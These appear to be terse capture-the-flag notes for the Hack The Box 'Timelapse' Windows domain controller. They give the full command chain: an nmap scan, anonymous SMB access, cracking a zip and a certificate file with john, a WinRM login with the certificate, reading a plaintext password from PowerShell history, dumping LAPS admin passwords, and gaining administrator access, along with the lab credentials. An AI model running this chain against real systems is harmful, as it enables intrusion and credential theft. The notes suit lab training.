nmap -p- -v  -sV -A -sC --min-rate 10000 -Pn 10.10.11.152

PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-12-14 21:22:26Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Issuer: commonName=dc01.timelapse.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-25T14:05:29
| Not valid after:  2022-10-25T14:25:29
| MD5:   e233 a199 4504 0859 013f b9c5 e4f6 91c3
|_SHA-1: 5861 acf7 76b8 703f d01e e25d fc7c 9952 a447 7652
|_ssl-date: 2022-12-14T21:23:59+00:00; +7h59m59s from scanner time.
| tls-alpn: 
|_  http/1.1
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49690/tcp open  msrpc             Microsoft Windows RPC
49703/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m57s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-12-14T21:23:21
|_  start_date: N/A

smbclient --no-pass -L //10.10.11.152

smbclient --no-pass //10.10.11.152/Shares

zip2john winrm_backup.zip >1.txt
john --wordlist=/usr/share/wordlists/rockyou.txt 1.txt
john --show 1.txt

unzip -P supremelegacy winrm_backup.zip

sudo apt install john-data
pfx2john legacyy_dev_auth.pfx|tee pfx.hash
john --wordlist=/usr/share/wordlists/rockyou.txt pfx.hash

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem 

openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.pem 

openssl rsa -in key.pem -out server.key

evil-winrm -i 10.10.11.152 -c cert.pem -k server.key -S

Administrator
babywyrm
Guest
krbtgt
legacyy
payl0ad
sinfulz
svc_deploy
thecybergeek

cat C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck                                   
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force                                                       
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)              
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}

evil-winrm -i dc01.timelapse.htb -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime

evil-winrm -i dc01.timelapse.htb -u administrator -p 'u%79X5wp3B69ZMbw44vFo61k' -S

ls -Path c:\users -Recurse -Name root.txt
type c:\users\TRX\Desktop\root.txt